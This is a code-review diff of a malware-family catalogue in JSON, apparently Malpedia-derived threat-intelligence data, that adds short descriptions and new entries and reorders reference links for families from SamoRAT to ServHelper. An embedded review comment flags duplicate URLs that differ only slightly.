+ "https://unit42.paloaltonetworks.com/c2-traffic/"
 ],
 "synonyms": [],
 "type": []
@@ -42801,7 +44817,7 @@
 "value": "Sality"
 },
 {
- "description": "",
+ "description": "According to PCrisk, SamoRAT is a Remote Access Trojan (RAT), a type of malware that allows the cyber criminals responsible to monitor and control the infected computer. In most cases, RATs are used to steal sensitive information and/or install other malware onto the infected computer. ",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.samo_rat",
@@ -42814,39 +44830,39 @@
 "value": "SamoRAT"
 },
 {
- "description": "",
+ "description": "According to PCrisk, Samsam is high-risk ransomware designed to infect unpatched servers and encrypt files stored on computers networked to the infected server.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.samsam",
- "https://www.youtube.com/watch?v=LUxOcpIRxmg",
- "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/SamSam-The-Almost-Six-Million-Dollar-Ransomware.pdf",
- "https://nakedsecurity.sophos.com/2018/08/02/how-to-defend-yourself-against-samsam-ransomware/",
- "https://www.secureworks.com/blog/samsam-converting-opportunity-into-profit",
- "https://www.secureworks.com/research/threat-profiles/gold-lowell",
- "https://news.sophos.com/en-us/2018/11/29/how-a-samsam-like-attack-happens-and-what-you-can-do-about-it/",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf",
- "https://news.sophos.com/en-us/2018/07/31/sophoslabs-releases-samsam-ransomware-report/",
 "https://www.justice.gov/opa/pr/two-iranian-men-indicted-deploying-ransomware-extort-hospitals-municipalities-and-public",
+ "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/SamSam-The-Almost-Six-Million-Dollar-Ransomware.pdf",
+ "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
+ "https://www.secureworks.com/research/samsam-ransomware-campaigns",
+ "https://therecord.media/iranian-hackers-behind-cox-media-group-ransomware-attack/",
+ "https://nakedsecurity.sophos.com/2018/07/31/samsam-the-almost-6-million-ransomware/",
+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf",
+ "https://news.sophos.com/en-us/2018/07/31/samsam-guide-to-coverage/",
+ "https://nakedsecurity.sophos.com/2018/05/01/samsam-ransomware-a-mean-old-dog-with-a-nasty-new-trick-report/",
+ "http://blog.talosintel.com/2016/03/samsam-ransomware.html",
+ 
"https://www.secureworks.com/research/threat-profiles/gold-lowell",
+ "https://www.secureworks.com/blog/samas-ransomware",
+ "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/",
+ "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf",
+ "http://blog.talosintelligence.com/2018/01/samsam-evolution-continues-netting-over.html",
+ "https://news.sophos.com/en-us/2018/11/29/how-a-samsam-like-attack-happens-and-what-you-can-do-about-it/",
+ "https://www.youtube.com/watch?v=LUxOcpIRxmg",
+ "https://www.secureworks.com/blog/ransomware-deployed-by-adversary",
 "https://sites.temple.edu/care/ci-rw-attacks/",
 "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1",
- "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf",
- "https://www.justice.gov/opa/press-release/file/1114746/download",
- "https://www.secureworks.com/blog/samas-ransomware",
- "https://nakedsecurity.sophos.com/2018/09/11/the-rise-of-targeted-ransomware/",
- "https://nakedsecurity.sophos.com/2018/05/01/samsam-ransomware-a-mean-old-dog-with-a-nasty-new-trick-report/",
 "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
- "https://news.sophos.com/en-us/2018/07/31/samsam-guide-to-coverage/",
- "https://www.secureworks.com/blog/ransomware-deployed-by-adversary",
- "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
+ "https://nakedsecurity.sophos.com/2018/09/11/the-rise-of-targeted-ransomware/",
+ "https://news.sophos.com/en-us/2018/07/31/sophoslabs-releases-samsam-ransomware-report/",
+ "https://nakedsecurity.sophos.com/2018/08/02/how-to-defend-yourself-against-samsam-ransomware/",
+ "https://www.secureworks.com/blog/samsam-converting-opportunity-into-profit",
 "https://www.crowdstrike.com/blog/an-in-depth-analysis-of-samsam-ransomware-and-boss-spider/",
- 
"https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf",
- "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/",
- "http://blog.talosintelligence.com/2018/01/samsam-evolution-continues-netting-over.html",
- "https://therecord.media/iranian-hackers-behind-cox-media-group-ransomware-attack/",
 "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/samsam-ransomware-chooses-its-targets-carefully-wpna.aspx",
- "https://nakedsecurity.sophos.com/2018/07/31/samsam-the-almost-6-million-ransomware/",
- "http://blog.talosintel.com/2016/03/samsam-ransomware.html",
- "https://www.secureworks.com/research/samsam-ransomware-campaigns"
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf",
+ "https://www.justice.gov/opa/press-release/file/1114746/download"
 ],
 "synonyms": [
 "Samas"
@@ -42883,16 +44899,29 @@
 "uuid": "32e9c2ce-08a6-47ee-8636-ea83711930b1",
 "value": "SapphireMiner"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sapphire_stealer",
+ "https://github.com/0day2/SapphireStealer/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "e1b2b792-033a-438d-a9c4-4d2adf1abb43",
+ "value": "SapphireStealer"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.sappycache",
- "https://blog.alyac.co.kr/m/2219",
 "https://www.clearskysec.com/wp-content/uploads/2019/08/ClearSky-2019-H1-Cyber-Events-Summary-Report.pdf",
+ "https://blog.alyac.co.kr/m/2219",
+ "https://www.fireeye.com/blog/threat-research/2019/03/winrar-zero-day-abused-in-multiple-campaigns.html",
 "https://blog.reversinglabs.com/blog/catching-lateral-movement-in-internal-emails",
- "https://blog.alyac.co.kr/2219",
- "https://www.fireeye.com/blog/threat-research/2019/03/winrar-zero-day-abused-in-multiple-campaigns.html"
+ "https://blog.alyac.co.kr/2219"
 ],
 "synonyms": [],
 "type": []
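Review bot: The new side of the Samsam `refs` array lists the same CrowdStrike article twice, once as the added `"https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/"` and once as the unchanged `"https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1"`, differing only by the trailing slash. The sappycache hunk on this same line has the same pattern with `"https://blog.alyac.co.kr/m/2219"` and `"https://blog.alyac.co.kr/2219"`, and the scieron hunk later in the change keeps two `chinese-threat-actor-scarab-targeting-ukraine` entries that differ only by a trailing `/`. If this cluster file is produced by a generator from upstream data, the fix is to normalise each ref (strip a trailing `/`) and deduplicate before emitting, so the reorder does not keep re-shuffling the same pair; otherwise one of each pair should be dropped by hand. The Samsam hunk starts at its `@@` header two lines up, so the full array is visible here.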
@@ -42905,9 +44934,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.sarhust",
+ "https://www.fortinet.com/blog/threat-research/hussarini---targeted-cyber-attack-in-the-philippines.html",
 "https://speakerdeck.com/ashley920/into-the-fog-the-return-of-icefog-apt",
- "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/bkdr_sarhust.a",
- "https://www.fortinet.com/blog/threat-research/hussarini---targeted-cyber-attack-in-the-philippines.html"
+ "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/bkdr_sarhust.a"
 ],
 "synonyms": [
 "ENDCMD",
@@ -42923,13 +44952,13 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.sasfis",
- "https://isc.sans.edu/forums/diary/Sasfis+Propagation/8860/",
- "https://www.symantec.com/security-center/writeup/2010-020210-5440-99",
 "https://www.virusbulletin.com/virusbulletin/2012/11/tracking-2012-sasfis-campaign",
+ "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/sasfis",
 "https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Sasfis-O/detailed-analysis.aspx",
 "https://blog.trendmicro.com/trendlabs-security-intelligence/sasfis-fizzles-in-the-background/",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/sasfis-malware-uses-a-new-trick/",
- "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/sasfis"
+ "https://isc.sans.edu/forums/diary/Sasfis+Propagation/8860/",
+ "https://www.symantec.com/security-center/writeup/2010-020210-5440-99",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/sasfis-malware-uses-a-new-trick/"
 ],
 "synonyms": [
 "Oficla"
@@ -42939,19 +44968,34 @@
 "uuid": "4c4ceb45-b326-45aa-8f1a-1229e90c78b4",
 "value": "Sasfis"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.satacom",
+ "https://securelist.com/satacom-delivers-cryptocurrency-stealing-browser-extension/109807/"
+ ],
+ "synonyms": [
+ "LegionLoader"
+ ],
+ "type": []
+ },
+ "uuid": "b08af3b5-2453-4d4b-972a-32e6602410f2",
+ "value": "Satacom"
+ },
 {
 "description": "Ransomware.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.satan",
- "https://www.alienvault.com/blogs/labs-research/satan-ransomware-spawns-new-methods-to-spread",
- "http://blog.nsfocusglobal.com/categories/trend-analysis/satan-variant-analysis-handling-guide/",
- "https://www.bleepingcomputer.com/news/security/dbger-ransomware-uses-eternalblue-and-mimikatz-to-spread-across-networks/",
 "https://bartblaze.blogspot.com/2020/01/satan-ransomware-rebrands-as-5ss5c.html",
 "https://cyware.com/news/new-satan-ransomware-variant-lucky-exposes-10-server-side-vulnerabilities-070afbd2",
- "https://www.bleepingcomputer.com/news/security/new-satan-ransomware-available-through-a-ransomware-as-a-service-/",
+ "http://blog.nsfocusglobal.com/categories/trend-analysis/satan-variant-analysis-handling-guide/",
+ "https://www.bleepingcomputer.com/news/security/dbger-ransomware-uses-eternalblue-and-mimikatz-to-spread-across-networks/",
 "https://bartblaze.blogspot.com/2018/04/satan-ransomware-adds-eternalblue.html",
- "https://www.sangfor.com/source/blog-network-security/1094.html"
+ "https://www.sangfor.com/source/blog-network-security/1094.html",
+ "https://www.bleepingcomputer.com/news/security/new-satan-ransomware-available-through-a-ransomware-as-a-service-/",
+ "https://www.alienvault.com/blogs/labs-research/satan-ransomware-spawns-new-methods-to-spread"
 ],
 "synonyms": [
 "5ss5c",
@@ -42964,12 +45008,12 @@
 "value": "Satan"
 },
 {
- "description": "",
+ "description": "According to bitdefender, Satana is an aggressive ransomware for Windows that encrypts the computer\u2019s master boot record (MBR) and prevents it from starting.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.satana",
- "https://www.cylance.com/threat-spotlight-satan-raas",
- "https://blog.reversinglabs.com/blog/retread-ransomware"
+ "https://blog.reversinglabs.com/blog/retread-ransomware",
+ "https://www.cylance.com/threat-spotlight-satan-raas"
 ],
 "synonyms": [],
 "type": []
@@ -42996,8 +45040,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.sathurbot",
- "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/",
- "https://www.welivesecurity.com/2017/04/06/sathurbot-distributed-wordpress-password-attack/"
+ "https://www.welivesecurity.com/2017/04/06/sathurbot-distributed-wordpress-password-attack/",
+ "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/"
 ],
 "synonyms": [],
 "type": []
@@ -43010,9 +45054,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.scanpos",
- "https://github.com/malware-kitten/securitykitten.github.io/blob/master/_posts/2016-11-15-scanpos.md",
+ "https://securitykitten.github.io/2016/11/15/scanpos.html",
 "https://www.proofpoint.com/us/threat-insight/post/kronos-banking-trojan-used-to-deliver-new-point-of-sale-malware",
- "https://securitykitten.github.io/2016/11/15/scanpos.html"
+ "https://github.com/malware-kitten/securitykitten.github.io/blob/master/_posts/2016-11-15-scanpos.md"
 ],
 "synonyms": [],
 "type": []
@@ -43042,9 +45086,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.scarab_ransom",
- "https://securelist.com/story-of-the-year-2019-cities-under-ransomware-siege/95456/",
 "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
 "http://malware-traffic-analysis.net/2017/11/23/index.html",
+ "https://securelist.com/story-of-the-year-2019-cities-under-ransomware-siege/95456/",
 "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf"
 ],
 "synonyms": [],
@@ -43071,8 +45115,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.schneiken",
- "https://github.com/vithakur/schneiken",
- "https://engineering.salesforce.com/malware-analysis-new-trojan-double-dropper-5ed0a943adb"
+ "https://engineering.salesforce.com/malware-analysis-new-trojan-double-dropper-5ed0a943adb",
+ "https://github.com/vithakur/schneiken"
 ],
 "synonyms": [],
 "type": []
@@ -43086,8 +45130,8 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.scieron",
 "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=8bfa7311-fdd9-4f8d-b813-1ab6c9d2c363",
- "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview",
 "https://www.sentinelone.com/labs/chinese-threat-actor-scarab-targeting-ukraine",
+ "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview",
 "https://www.sentinelone.com/labs/chinese-threat-actor-scarab-targeting-ukraine/"
 ],
 "synonyms": [],
@@ -43154,8 +45198,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.scrubcrypter", - "https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/scrubcrypt-the-rebirth-of-jlaive", - "https://perception-point.io/blog/the-rebranded-crypter-scrubcrypt/" + "https://0xtoxin.github.io/threat%20breakdown/ScrubCrypt-Rebirth-Of-Jlaive/", + "https://perception-point.io/blog/the-rebranded-crypter-scrubcrypt/", + "https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/scrubcrypt-the-rebirth-of-jlaive" ], "synonyms": [], "type": [] 
@@ -43168,29 +45213,29 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sdbbot", - "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-returns-with-a-new-bag-of-tricks-602104", - "https://blog.fox-it.com/2020/11/16/ta505-a-brief-history-of-their-time/", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", - "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672", - "https://vblocalhost.com/uploads/VB2020-Jung.pdf", - "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do", - "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", - "https://www.cyber.gov.au/acsc/view-all-content/alerts/sdbbot-targeting-health-sector", - "https://www.telekom.com/en/blog/group/article/inside-of-cl0p-s-ransomware-operation-615824", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", - "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", - "https://www.telekom.com/en/blog/group/article/eager-beaver-a-short-overview-of-the-restless-threat-actor-ta505-609546", - "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", - "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", - "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", - "https://www.secureworks.com/research/threat-profiles/gold-tahoe", - "https://github.com/Tera0017/SDBbot-Unpacker", - "https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/", 
"https://intel471.com/blog/a-brief-history-of-ta505", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", + "https://www.cyber.gov.au/acsc/view-all-content/alerts/sdbbot-targeting-health-sector", + "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-returns-with-a-new-bag-of-tricks-602104", + "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/", + "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://github.com/Tera0017/SDBbot-Unpacker", + "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672", + "https://www.telekom.com/en/blog/group/article/inside-of-cl0p-s-ransomware-operation-615824", "https://global.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.96_ENG.pdf", - "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader" + "https://www.secureworks.com/research/threat-profiles/gold-tahoe", + "https://vblocalhost.com/uploads/VB2020-Jung.pdf", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://blog.fox-it.com/2020/11/16/ta505-a-brief-history-of-their-time/", + 
"https://www.telekom.com/en/blog/group/article/eager-beaver-a-short-overview-of-the-restless-threat-actor-ta505-609546", + "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf" ], "synonyms": [], "type": [] @@ -43203,10 +45248,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.seadaddy", - "https://www.cyborgsecurity.com/cyborg_labs/python-malware-on-the-rise/", - "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", - "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=6ab66701-25d7-4685-ae9d-93d63708a11c&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments", + "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", + "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", + "https://www.cyborgsecurity.com/cyborg_labs/python-malware-on-the-rise/", "https://unit42.paloaltonetworks.com/unit-42-technical-analysis-seaduke/" ], "synonyms": [ 
@@ -43236,14 +45281,15 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sectop_rat", + "https://www.gdatasoftware.com/blog/2019/11/35548-new-sectoprat-remote-access-malware-utilizes-second-desktop-to-control-browsers", + "https://vxhive.blogspot.com/2021/01/deep-dive-into-sectoprat.html", + "https://www.cisecurity.org/insights/blog/top-10-malware-march-2022", "https://cyberflorida.org/2022/11/arechclient2/", "https://tampabay.tech/2022/11/30/arechclient2/", - "https://dr4k0nia.github.io/posts/Analysing-a-sample-of-ArechClient2/", "https://medium.com/@gi7w0rm/a-long-way-to-sectoprat-eb2f0aad6ec8", - "https://www.cisecurity.org/insights/blog/top-10-malware-march-2022", - "https://vxhive.blogspot.com/2021/01/deep-dive-into-sectoprat.html", - "https://www.gdatasoftware.com/blog/2019/11/35548-new-sectoprat-remote-access-malware-utilizes-second-desktop-to-control-browsers", "https://www.gdatasoftware.com/blog/2021/02/36633-new-version-adds-encrypted-communication", + "https://dr4k0nia.github.io/posts/Analysing-a-sample-of-ArechClient2/", + "https://www.rapid7.com/blog/post/2023/08/31/fake-update-utilizes-new-idat-loader-to-execute-stealc-and-lumma-infostealers/", "https://cdn-production.blackpointcyber.com/wp-content/uploads/2022/11/01161208/Blackpoint-Cyber-Ratting-out-Arechclient2-Whitepaper.pdf" ], "synonyms": [ 
@@ -43276,14 +45322,14 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sedreco", - "https://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-pawn-storm.pdf", - "http://www.malware-reversing.com/2012/12/3-disclosure-of-another-0day-malware_15.html", - "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf", - "https://www.secureworks.com/research/threat-profiles/iron-twilight", "https://www.mandiant.com/sites/default/files/2021-09/APT28-Center-of-Storm-2017.pdf", "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", + "https://www.secureworks.com/research/threat-profiles/iron-twilight", "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/", + "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf", + "https://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-pawn-storm.pdf", + "http://www.malware-reversing.com/2012/12/3-disclosure-of-another-0day-malware_15.html", "https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/" ], "synonyms": [ 
@@ -43300,26 +45346,26 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.seduploader", - "https://blog.xpnsec.com/apt28-hospitality-malware-part-2/", "http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-flash-zero-day-used-in-pawn-storm-campaign/", - "https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government", "https://securelist.com/a-slice-of-2017-sofacy-activity/83930/", - "https://researchcenter.paloaltonetworks.com/2016/06/unit42-new-sofacy-attacks-against-us-government-agency/", - "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf", - "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/", - "https://www.fireeye.com/blog/threat-research/2017/08/apt28-targets-hospitality-sector.html", "https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/", - "https://blog.yoroi.company/research/apt28-and-upcoming-elections-possible-interference-signals-part-ii/", - "http://www.welivesecurity.com/2015/07/10/sednit-apt-group-meets-hacking-team/", - "https://www.emanueledelucia.net/apt28-sofacy-seduploader-under-the-christmas-tree/", - "https://www.secureworks.com/research/threat-profiles/iron-twilight", "https://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-pawn-storm.pdf", + "https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government", + "https://www.welivesecurity.com/2017/05/09/sednit-adds-two-zero-day-exploits-using-trumps-attack-syria-decoy/", "https://www.mandiant.com/sites/default/files/2021-09/APT28-Center-of-Storm-2017.pdf", - "https://www.proofpoint.com/us/threat-insight/post/apt28-racing-exploit-cve-2017-11292-flash-vulnerability-patches-are-deployed", + "https://blog.xpnsec.com/apt28-hospitality-malware-part-2/", + "https://www.secureworks.com/research/threat-profiles/iron-twilight", 
"https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", "http://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html", - "https://www.welivesecurity.com/2017/05/09/sednit-adds-two-zero-day-exploits-using-trumps-attack-syria-decoy/", - "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html" + "https://www.emanueledelucia.net/apt28-sofacy-seduploader-under-the-christmas-tree/", + "http://www.welivesecurity.com/2015/07/10/sednit-apt-group-meets-hacking-team/", + "https://www.fireeye.com/blog/threat-research/2017/08/apt28-targets-hospitality-sector.html", + "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf", + "https://www.proofpoint.com/us/threat-insight/post/apt28-racing-exploit-cve-2017-11292-flash-vulnerability-patches-are-deployed", + "https://researchcenter.paloaltonetworks.com/2016/06/unit42-new-sofacy-attacks-against-us-government-agency/", + "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", + "https://blog.yoroi.company/research/apt28-and-upcoming-elections-possible-interference-signals-part-ii/", + "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/" ], "synonyms": [ "GAMEFISH", 
@@ -43347,20 +45393,20 @@ "value": "seinup" }, { - "description": "Ransomware.", + "description": "According to PCrisk, Sekhmet is ransomware. This malicious program operates by encrypting data and demanding ransom payments for decryption. During the encryption process, all affected files are appended with an extension, consisting of random characters (e.g. \".HrUSsw\", \".WNgh\", \".NdWfEr\", etc.).", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sekhmet", - "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", - "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/", - "https://www.bleepingcomputer.com/news/security/ransomware-dev-releases-egregor-maze-master-decryption-keys/", - "https://blog.minerva-labs.com/egregor-ransomware-an-in-depth-analysis", - "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", - "https://securityaffairs.co/wordpress/127826/malware/egregor-sekhmet-decryption-keys.html", "https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-007/", - "https://id-ransomware.blogspot.com/2020/03/sekhmet-ransomware.html" + "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/", + "https://securityaffairs.co/wordpress/127826/malware/egregor-sekhmet-decryption-keys.html", + "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/", + "https://id-ransomware.blogspot.com/2020/03/sekhmet-ransomware.html", + "https://blog.minerva-labs.com/egregor-ransomware-an-in-depth-analysis", + "https://www.bleepingcomputer.com/news/security/ransomware-dev-releases-egregor-maze-master-decryption-keys/", + "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", + 
"https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3" ], "synonyms": [], "type": [] @@ -43373,8 +45419,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.selfmake", - "https://twitter.com/8th_grey_owl/status/1481433481485844483", - "https://jp.security.ntt/resources/EN-BlackTech_2021.pdf" + "https://jp.security.ntt/resources/EN-BlackTech_2021.pdf", + "https://twitter.com/8th_grey_owl/status/1481433481485844483" ], "synonyms": [], "type": [] 
@@ -43455,30 +45501,30 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.servhelper", - "https://www.gdatasoftware.com/blog/2020/07/36122-hidden-miners", - "https://threatrecon.nshc.net/2019/08/29/sectorj04-groups-increased-activity-in-2019/", - "https://ti.360.net/blog/articles/excel-4.0-macro-utilized-by-ta505-to-target-financial-institutions-recently-en/", + "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", + "https://intel471.com/blog/a-brief-history-of-ta505", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", - "https://www.binarydefense.com/an-updated-servhelper-tunnel-variant/", + "https://ti.360.net/blog/articles/excel-4.0-macro-utilized-by-ta505-to-target-financial-institutions-recently-en/", + "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/research/servhelper-evolution-and-new-ta505-campaigns/", "https://prodaft.com/m/reports/TeslaGun_TLPWHITE.pdf", + "https://www.prodaft.com/m/reports/TeslaGun_TLPWHITE.pdf", + "https://blog.talosintelligence.com/2021/08/raccoon-and-amadey-install-servhelper.html", "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505-part2/", - "https://securitynews.sonicwall.com/xmlpost/servhelper-2-0-enriched-with-bot-capabilities-and-allow-remote-desktop-access/", "https://insights.oem.avira.com/ta505-apt-group-targets-americas/", "https://www.deepinstinct.com/2019/04/02/new-servhelper-variant-employs-excel-4-0-macro-to-drop-signed-payload/", - "https://blog.trendmicro.com/trendlabs-security-intelligence/ta505-at-it-again-variety-is-the-spice-of-servhelper-and-flawedammyy/", - 